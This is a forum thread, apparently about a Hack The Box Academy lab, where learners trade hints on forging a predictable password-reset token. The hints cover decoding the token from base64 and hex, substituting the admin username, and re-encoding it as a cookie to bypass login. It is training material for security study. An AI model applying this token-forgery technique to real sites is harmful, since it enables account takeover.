Hello everyone. Have problems with question 2 in “Predictable Reset Token” Broken Authentication module. I can’t understand how to login as htbadmin (htbuser is ok, it’s very easy)
I think I tried everything: php_mt_seed script to find something with mt_rand() - no results
Maybe this temp password = some hash, but not
Noticed that temp password value uses “0-9” and “a-f” values, but this didn’t help me
Hi
you have to understand how the reset password token is generated. Then tamper it with the htbadmin user. Once you got it just bypass the login (look at inspect page).
you have to decode the base64 string which is given by the htbuser reset password. Tamper it with htbadmin:<rest_of_string_here>:<…>, then encode it again to hex -->base64, copy the cookie in order to bypass login.
It’s also helping to try to encode back already decoded token, to be sure that resulting value is the same as given by “Show temporary passowrd for htbuser”. And then encode token for the htbadmin using the same approach.
Base64dDecoding the temp password for htbuser is just numbers. How am I supposed to tamper with it? I thought decoding it would result in something like: htbuser####, and I would just change the htbuser > htbadmin#### and encode it.
I am kinda stuck here, any tips ?
A prerequisite for solving this one is to be able to spot different types of encoded strings.
Once you are aware of different ways of encoding (base64, ascii) and different output formats (Hex, with or without spaces) it’s really straightforward.
I did it manually without a script (but with online tools ).
Show the htbuser temporary password.
Inspect it - it looks a lot like a base64 encoded string.
Inspect the decoded base64 string - this is where I had to learn about hex formatting without spaces, since it didn’t look like anything I knew so far.